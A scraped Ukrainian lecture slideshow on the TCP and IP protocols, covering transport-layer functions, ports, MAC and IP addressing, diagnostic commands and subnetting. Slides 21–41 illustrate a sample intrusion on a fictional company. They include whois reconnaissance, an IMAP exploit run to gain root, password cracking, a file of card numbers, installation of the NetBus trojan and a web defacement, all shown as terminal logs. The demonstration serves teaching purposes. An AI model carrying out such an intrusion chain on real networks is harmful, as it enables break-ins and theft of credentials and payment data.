Презентация на тему: Протоколи ТСР і ІР

Реклама. Продолжение ниже
Протоколи ТСР і ІР
Навчальні питання
Розробники ТСР/ІР
1. Протокол управління передачею – ТСР
Місце протоколів
Місце транспортного рівня
Протоколи ТСР і ІР
Сегментація і мультиплексування
Задачі транспортного рівня
Протоколи ТСР і ІР
Вибір протоколу транспортного рівня
Протоколи ТСР і ІР
Протоколи ТСР і ІР
Групи портів ТСР /UDP
Протоколи ТСР і ІР
Протоколи ТСР і ІР
Протоколи ТСР і ІР
Протоколи ТСР і ІР
Протоколи ТСР і ІР
Протоколи ТСР і ІР
Протоколи ТСР і ІР
Протоколи ТСР і ІР
Протоколи ТСР і ІР
Протоколи ТСР і ІР
Протоколи ТСР і ІР
Протоколи ТСР і ІР
Протоколи ТСР і ІР
Протоколи ТСР і ІР
Протоколи ТСР і ІР
Протоколи ТСР і ІР
Протоколи ТСР і ІР
Протоколи ТСР і ІР
Пример осуществления атаки
Протоколи ТСР і ІР
Протоколи ТСР і ІР
Протоколи ТСР і ІР
Протоколи ТСР і ІР
Протоколи ТСР і ІР
Протоколи ТСР і ІР
Протоколи ТСР і ІР
Пример осуществления атаки
2. Протокол ІР. Підмережі
2.1. Адресація в IP-мережах.
Адреса комп'ютеру
1 рівень: МАС-адреса
МАС-адреса
Протоколи ТСР і ІР
Протоколи ТСР і ІР
2 рівень: ІР-адреса
Ipconfig
Ipconfig /all
Ping
Ping -t
Ping -l
Ping -n
Tracert
Tracert
PathPing
JPerf
Tracert
Протоколи ТСР і ІР
Протоколи ТСР і ІР
Маска підмережі
Підмережі
Протоколи ТСР і ІР
Протоколи ТСР і ІР
Завдання
Протоколи ТСР і ІР
Протоколи ТСР і ІР
Вправа
Висновки
Незабаром IP-адреса закінчаться
1/72
Средняя оценка: 4.4/5 (всего оценок: 16)
Код скопирован в буфер обмена
Скачать (4076 Кб)
Реклама. Продолжение ниже
1

Первый слайд презентации: Протоколи ТСР і ІР

Лекція №4

Изображение слайда
1/1
2

Слайд 2: Навчальні питання

Протокол управління передачею – ТСР ( Transmission Control Protocol ). Протокол IP. Підмережі.

Изображение слайда
1/1
3

Слайд 3: Розробники ТСР/ІР

Винт Серф Роберт Кан Протокол передачі даних TCP/IP був розроблений В интом Серфом. У 1974 році, в період роботи в Стенфордському університеті, разом з Робертом Каном він опублікував статтю "A Protocol for Packet Network Intercommunication" ("Протокол для пакетної міжмережевої комунікації"), в якій був описаний протокол передачі даних TCP (transmission-control protocol), що дозволяє передавати дані між різними мережами. У 1976 році Серф перейшов на роботу в Агентство передових оборонних дослідницьких проектів ( DARPA, Defense Advanced Research Projects Agency) міністерства оборони США. У цьому агентстві Серф разом з Каном займався розробкою технологій передачі пакетів даних і безпекою. За його участю в 1978 році розроблений раніше протокол передачі даних був поділений на дві частини - TCP і IP (Internet protocol). В результаті з'явився стек протоколів TCP/IP, який до цього дня є стандартом для передачі даних в Інтернеті.

Изображение слайда
Изображение для работы со слайдом
Изображение для работы со слайдом
1/3
4

Слайд 4: 1. Протокол управління передачею – ТСР

Transmission Control Protocol

Изображение слайда
1/1
5

Слайд 5: Місце протоколів

ТСР IP Рівень додатків Рівень транспортний Рівень Інтернет Рівень доступу

Изображение слайда
Изображение для работы со слайдом
1/2
6

Слайд 6: Місце транспортного рівня

Изображение слайда
Изображение для работы со слайдом
1/2
7

Слайд 7

Мультиплексування – одночасна передача сегментів різних програмних додатків від різних користувачів через мережу. Який може бути максимальний розмір сегменту? Якщо сегменти утворюються різними додатками, те яку задачу необхідно буде вирішити при їх передачі? Функції транспортного рівня Сегментування даних Мультиплексування Сегментування – процес розподілу даних, що призначені для передачі, на невеликі більш керовані частини. Максимальний розмір сегменту залежіть від максимальної довжини фрейму канального рівня. На даний час для передачі даних на канальному рівні основним протоколом є Ethernet.

Изображение слайда
Изображение для работы со слайдом
Изображение для работы со слайдом
1/3
Реклама. Продолжение ниже
8

Слайд 8: Сегментація і мультиплексування

Изображение слайда
Изображение для работы со слайдом
Изображение для работы со слайдом
1/3
9

Слайд 9: Задачі транспортного рівня

Відстеження окремих зв'язків між програмами на комп'ютері відправника і одержувача Сегментація даних на комп'ютері відправника і управління передачею кожної частини Зборка прийнятої інформації у потоки даних додатків на комп'ютері одержувача Визначення різних додатків

Изображение слайда
Изображение для работы со слайдом
1/2
10

Слайд 10

Протоколи транспортного рівня Протокол, що встановлює з'єднання (connection-oriented ) Перед початком передачі інформації даному протоколу необхідний обмін службовими повідомленнями між вузлами мережі Transmission Control Protocol (TCP) - протокол управління передачею Протокол без встановлення з'єднання (connection less) Перед початком передачі інформації даний протокол не вимагає обміну службовими повідомленнями між вузлами мережі User Datagram Protocol (UDP) - протокол користувальницьких дейтаграм

Изображение слайда
Изображение для работы со слайдом
Изображение для работы со слайдом
1/3
11

Слайд 11: Вибір протоколу транспортного рівня

Протокол ТСР Протокол UD Р Вибір протоколу здійснюється в залежності від вимог додатку

Изображение слайда
Изображение для работы со слайдом
1/2
12

Слайд 12

Протоколи транспортного рівня

Изображение слайда
Изображение для работы со слайдом
Изображение для работы со слайдом
1/3
13

Слайд 13

Реалізується за допомогою засобу, що має назву - сокету ( socket ). Сокети дозволяють встановлювати зв'язок між прикладними програмами, яки одночасно працюють на різних вузлах мережі. Сокет складається з назви протоколу, ІР-адреси вузла і номеру порту : ТСР, 192.168.0.101:80 Порт є засобом, що дозволяє ідентифікувати додаток вузла, якому призначені одержані дані Кількість портів складає 65536, тобто теоретично така кількість процесів (прикладних програм), запущених на одному ПК, може одночасно здійснювати обмін даними. Мультиплексування

Изображение слайда
Изображение для работы со слайдом
Изображение для работы со слайдом
1/3
14

Слайд 14: Групи портів ТСР /UDP

Изображение слайда
Изображение для работы со слайдом
Изображение для работы со слайдом
Изображение для работы со слайдом
Изображение для работы со слайдом
1/5
Реклама. Продолжение ниже
15

Слайд 15

Изображение слайда
Изображение для работы со слайдом
Изображение для работы со слайдом
Изображение для работы со слайдом
Изображение для работы со слайдом
Изображение для работы со слайдом
1/6
16

Слайд 16

Під час передачі деякі ІР-пакети можуть бути втрачені або перекручені (пошкоджені) завадами, що виникають у каналах зв'язку. Тому одна з функцій транспортного рівня, що реалізується протоколом ТСР – відновлення даних. В залежності від умов передачі, кількість даних, що передаються від серверу до клієнта може змінюватися. Тобто об'єм даних, що передаються постійно адаптується до стану каналу – це інша функція протоколу ТСР. Функції протоколу ТСР Відновлення даних Керування потоком

Изображение слайда
Изображение для работы со слайдом
1/2
17

Слайд 17

Задачі протоколу ТСР - встановлення сесії зв'язку - надійність передачі даних - зборка прийнятих даних у правильному порядку управління потоком передачі

Изображение слайда
Изображение для работы со слайдом
1/2
18

Слайд 18

Изображение слайда
Изображение для работы со слайдом
1/2
19

Слайд 19

Питання

Изображение слайда
Изображение для работы со слайдом
1/2
20

Слайд 20

Изображение слайда
Изображение для работы со слайдом
1/2
21

Слайд 21

bigwidget.com

Изображение слайда
Изображение для работы со слайдом
1/2
22

Слайд 22

Record last updated on 29-Jun-98. Record created on 30-Jun-94. Database last updated on 13-Oct-98 06:21:01 EDT. Domain servers in listed order: EHECATL. BIGWIDGET 208.21.0.7 NS1.SPRINTLINK.NET 204.117.214.10 NS.COMMANDCORP.COM 130.205.70.10 Registrant: BigWidget, Conglomerated. (BWC2-DOM) 1234 Main Street Anytown, GA USA Domain Name: bigwidget.com Administrative Contact, Technical Contact, Zone Contact: BigWidget Admin (IA338-ORG) bwc-dnsadmin@bigwidget.com Phone- 678-555-1212 Fax- 678-555-1211 Billing Contact: BigWidget Billing (IB158-ORG) BigWidget-billing@bigwidget.com Phone- 678-555-1212 Fax- 678-555-1211 BIGWIDGET.COM

Изображение слайда
Изображение для работы со слайдом
1/2
23

Слайд 23

~$ telnet bigwidget.com 25 Trying 10.0.0.28... Connected to bigwidget.com Escape character is '^]'. hacker: hacker:~$ Connection closed by foreign host. telnet bigwidget.com 143 Trying 10.0.0.28... Connected to bigwidget.com. * OK bigwidget IMAP4rev1 Service 9.0(157) at Wed, 14 Oct 1998 11:51:50 -0400 (EDT) (Report problems in this server to MRC@CAC.Washington.EDU) . logout * BYE bigwidget IMAP4rev1 server terminating connection . OK LOGOUT completed Connection closed by foreign host.

Изображение слайда
1/1
24

Слайд 24

imap

Изображение слайда
Изображение для работы со слайдом
1/2
25

Слайд 25

imap

Изображение слайда
Изображение для работы со слайдом
1/2
26

Слайд 26

Изображение слайда
Изображение для работы со слайдом
1/2
27

Слайд 27

hacker ~$ ./imap_exploit bigwidget.com IMAP Exploit for Linux. Author: Akylonius (aky@galeb.etf.bg.ac.yu) Modifications: p1 (p1@el8.org) Completed successfully. hacker ~$ telnet bigwidget.com Trying 10.0.0.28... Connected to bigwidget.com. Red Hat Linux release 4.2 (Biltmore) Kernel 2.0.35 on an i686 root bigwidget:~# whoami root bigwidget:~# cat./hosts 127.0.0.1 localhost localhost.localdomain 208.21.2.10 thevault accounting 208.21.2.11 fasttalk sales 208.21.2.12 geekspeak engineering 208.21.2.13 people human resources 208.21.2.14 thelinks marketing 208.21.2.15 thesource information systems bigwidget:~# cd /etc bigwidget:~# rlogin thevault login:

Изображение слайда
1/1
28

Слайд 28

Allan B. Smith 6543-2223-1209-4002 12/99 Donna D. Smith 6543-4133-0632-4572 06/98 Jim Smith 6543-2344-1523-5522 01/01 Joseph L.Smith 6543-2356-1882-7532 04/02 Kay L. Smith 6543-2398-1972-4532 06/03 Mary Ann Smith 6543-8933-1332-4222 05/01 Robert F. Smith 6543-0133-5232-3332 05/99 thevault:~# cat visa.txt cd /data/creditcards thevault:~# thevault:~# crack /etc/passwd Cracking /etc/passwd... username: bobman password: nambob username: mary password: mary username: root password: ncc1701 thevault:~# ftp thesource Connected to thesource 220 thesource Microsoft FTP Service (Version 4.0). Name: administrator 331 Password required for administrator. Password: ******* 230 User administrator logged in. Remote system type is Windows_NT.

Изображение слайда
1/1
29

Слайд 29

Изображение слайда
Изображение для работы со слайдом
1/2
30

Слайд 30

Изображение слайда
Изображение для работы со слайдом
1/2
31

Слайд 31

ftp> cd \temp 250 CDW command successful. ftp> send netbus.exe local: netbus.exe remote: netbus.exe 200 PORT command successful. 150 Opening BINARY mode data connection for netbus.exe 226 Transfer complete. ftp> ftp> quit thevault:~$ telnet thesource Trying 208.21.2.160. .. Connected to thesource.bigwidget.com. Escape character is '^]'. Microsoft (R) Windows NT (TM) Version 4.00 (Build 1381) Welcome to MS Telnet Service Telnet Server Build 5.00.98217.1 login: administrator password: ******* *=============================================================== Welcome to Microsoft Telnet Server. *=============================================================== C:\> cd \temp C:\TEMP> netbus.exe

Изображение слайда
1/1
32

Слайд 32

Connected to the.source.bigwidget.com NetBus 1.6, by cf Screendump David Smith < dsmith@bigwidget.com > President@bigwidget.com My Raise < URGENT > Dear Mr. Smith I would like to thank you for the huge raise that you have seen fit to give me. With my new salary of $350,000.00 a year I am sure I am the highest paid mail clerk in the company. This really makes me feel good because I deserve it. Your Son, Dave David Smith

Изображение слайда
Изображение для работы со слайдом
Изображение для работы со слайдом
1/3
33

Слайд 33: Пример осуществления атаки

ИНФОРМ ЗАЩИТА НАУЧНО-ИНЖЕНЕРНОЕ ПРЕДПРИЯТИЕ Сеть компании BigWidget UNIX Firewall E-Mail сервер Web сервер Router NT Рабочие станции сеть UNIX NT UNIX imap Crack NetBus Пример осуществления атаки

Изображение слайда
Изображение для работы со слайдом
Изображение для работы со слайдом
Изображение для работы со слайдом
Изображение для работы со слайдом
Изображение для работы со слайдом
Изображение для работы со слайдом
1/7
34

Слайд 34

Изображение слайда
Изображение для работы со слайдом
1/2
35

Слайд 35

Изображение слайда
Изображение для работы со слайдом
1/2
36

Слайд 36

Изображение слайда
Изображение для работы со слайдом
1/2
37

Слайд 37

Изображение слайда
Изображение для работы со слайдом
1/2
38

Слайд 38

Изображение слайда
Изображение для работы со слайдом
1/2
39

Слайд 39

c:\> ftp webcentral Connected to webcentral 220 webcentral Microsoft FTP Service (Version 4.0). Name: jsmith 331 Password required for jsmith. Password: ******* 230 User jsmith logged in. Remote system type is Windows_NT. ftp> send index.html local: bigwedgie.html remote: index.html 200 PORT command successful. 150 Opening BINARY mode data connection for index.html 226 Transfer complete. ftp> ftp> quit 200 PORT command successful. 150 Opening ASCII mode data connection for /bin/ls. total 10 -rwxr-xr-x 9 jsmith jsmith 1024 Aug 17 17:07. -rwxr-xr-x 9 root root 1024 Aug 17 17:07.. -rwxr-xr-x 2 jsmith jsmith 2034 Aug 17 17:07 index.html -rwxr-xr-x 2 jsmith jsmith 1244 Aug 17 17:07 image1.gif -rwxr-xr-x 2 jsmith jsmith 10244 Aug 17 17:07 image2.gif -rwxr-x--x 6 jsmith jsmith 877 Aug 17 17:07 title.gif -rwxr-xr-x 2 jsmith jsmith 1314 Aug 17 17:07 bigwidget.jpg -rwxr-xr-x 2 jsmith jsmith 1824 Aug 17 17:07 page2.html 226 Transfer complete. bytes received in 0.82 seconds (0.76 Kbytes/sec) ftp> dir

Изображение слайда
1/1
40

Слайд 40

Изображение слайда
Изображение для работы со слайдом
1/2
41

Слайд 41: Пример осуществления атаки

ИНФОРМ ЗАЩИТА НАУЧНО-ИНЖЕНЕРНОЕ ПРЕДПРИЯТИЕ UNIX Firewall E-Mail сервер Web сервер Router NT Рабочие станции Сеть UNIX NT UNIX Сеть компании BigWidget Пример осуществления атаки

Изображение слайда
Изображение для работы со слайдом
Изображение для работы со слайдом
Изображение для работы со слайдом
Изображение для работы со слайдом
Изображение для работы со слайдом
Изображение для работы со слайдом
1/7
42

Слайд 42: 2. Протокол ІР. Підмережі

Изображение слайда
1/1
43

Слайд 43: 2.1. Адресація в IP-мережах

Изображение слайда
1/1
44

Слайд 44: Адреса комп'ютеру

Кожен комп'ютер у IP-мережі має адреси трьох рівнів: л окальну адресу (МАС-адресу) мережну адресу (ІР-адреса) домене ім'я ( www.hp.com )

Изображение слайда
1/1
45

Слайд 45: 1 рівень: МАС-адреса

Локальна адреса вузла. Для вузлів, що входять у локальні мережі - це МАС-адреса мережного адаптера чи порту маршрутизатора. Приклад: 11-А0-17-3D-BC-01. ( MAC – media access control – підрівень доступу до середовища передачі канального рівня моделі OSI).

Изображение слайда
Изображение для работы со слайдом
1/2
46

Слайд 46: МАС-адреса

Призначаються виробниками мережного устаткування і є унікальною. Використовується на канальному рівні тобто на рівні локальних мереж. 6 байтів

Изображение слайда
1/1
47

Слайд 47

МАС-адреса Переглянуть МАС-адресу комп'ютеру можна за допомогою команди ipconfig

Изображение слайда
Изображение для работы со слайдом
1/2
48

Слайд 48

МАС-адреса

Изображение слайда
Изображение для работы со слайдом
Изображение для работы со слайдом
1/3
49

Слайд 49: 2 рівень: ІР-адреса

Довжина 4 байта = 32 біта. Ця адреса використовується на мережному рівні, тобто на рівні, що забезпечує передачу даних між локальними мережами. Вона призначається адміністратором мережі під час налаштування мережного адаптеру комп'ютеру (або надається автоматично), а також призначається кожному порту маршрутизатора. 109 26 17 100 109.26.17.100

Изображение слайда
1/1
50

Слайд 50: Ipconfig

Изображение слайда
Изображение для работы со слайдом
1/2
51

Слайд 51: Ipconfig /all

Изображение слайда
Изображение для работы со слайдом
1/2
52

Слайд 52: Ping

Изображение слайда
Изображение для работы со слайдом
1/2
53

Слайд 53: Ping -t

Изображение слайда
Изображение для работы со слайдом
1/2
54

Слайд 54: Ping -l

Изображение слайда
Изображение для работы со слайдом
1/2
55

Слайд 55: Ping -n

Изображение слайда
Изображение для работы со слайдом
1/2
56

Слайд 56: Tracert

Изображение слайда
Изображение для работы со слайдом
1/2
57

Слайд 57: Tracert

Изображение слайда
Изображение для работы со слайдом
1/2
58

Слайд 58: PathPing

Изображение слайда
Изображение для работы со слайдом
1/2
59

Слайд 59: JPerf

Изображение слайда
Изображение для работы со слайдом
1/2
60

Слайд 60: Tracert

Изображение слайда
Изображение для работы со слайдом
1/2
61

Слайд 61

Изображение слайда
Изображение для работы со слайдом
1/2
62

Слайд 62

Изображение слайда
Изображение для работы со слайдом
1/2
63

Слайд 63: Маска підмережі

Маска – число, що використовується разом з ІР-адресою. Двійковий запис маски має одиниці у розрядах, що в ІР-адресі відповідають номеру мережі. Мережевий префікс 255.0.0.0 - /8 255.255.0.0 - /16 255.255.255.0 - /24

Изображение слайда
Изображение для работы со слайдом
1/2
64

Слайд 64: Підмережі

До введення маски було 2 градації адресування: мережа і номер комп ’ ютеру у даній мережі Введення маски створює 3 градації адресування: мережа, підмережа і номер комп ’ ютеру у даній підмережі № мережі № ПК № мережі № ПК № підмережі І ІІ ІІ І ІІІ

Изображение слайда
1/1
65

Слайд 65

Изображение слайда
Изображение для работы со слайдом
Изображение для работы со слайдом
1/3
66

Слайд 66

Изображение слайда
Изображение для работы со слайдом
Изображение для работы со слайдом
1/3
67

Слайд 67: Завдання

192.168.0.62/27 192.168.0.65/27 комутатор або маршрутизатор

Изображение слайда
Изображение для работы со слайдом
Изображение для работы со слайдом
Изображение для работы со слайдом
1/4
68

Слайд 68

Изображение слайда
Изображение для работы со слайдом
1/2
69

Слайд 69

Изображение слайда
Изображение для работы со слайдом
1/2
70

Слайд 70: Вправа

172.16.2.131/28 ІР-адреса ПК switch ІР-адреса мережі

Изображение слайда
Изображение для работы со слайдом
Изображение для работы со слайдом
1/3
71

Слайд 71: Висновки

Транспортний рівень займає проміжне положення між рівнем додатків і рівнем Інтернет у моделі ТСР/ІР. Головні функції, що виконуються транспортним рівнем – сегментування і мультиплексування Свої функції транспортний рівень виконує за допомогою протоколів ТСР і UDP Протокол ТСР забезпечує гарантовану доставку сегментів через мережу. Перевагою протоколу UDP є більш швидка передача і менше навантаження на мережу.

Изображение слайда
1/1
72

Последний слайд презентации: Протоколи ТСР і ІР: Незабаром IP-адреса закінчаться

Когда Винт Серф вместе с другими специалистами заложил основу интернета в 1977 году, он ввел "интернет-протокол четвертой версии" (IPv4), который мог обеспечить 4,2 млрд адресов. Однако число устройств с доступом в интернет, особенно мобильных телефонов, возрастает, и теперь свободны лишь 14% этих адресов. По оценкам, адреса IPv4, каждый из которых представляет собой ряд из 32 двоичных символов, закончатся к 2010 году. Новая система, названная IPv6, готова к внедрению уже больше десятилетия. В системе IPv6 каждый адрес записывается 128 битами, что позволяет присвоить 340 триллионов триллионов триллионов различных адресов – это 340.000.000.000.000.000.000.000.000.000.000.000.000. Как ожидается, это должно удовлетворить потребности человечества на несколько десятилетий вперед. http://podrobnosti.ua/internet/2008/09/26/557254.html Винт Серф

Изображение слайда
Изображение для работы со слайдом
1/2
Реклама. Продолжение ниже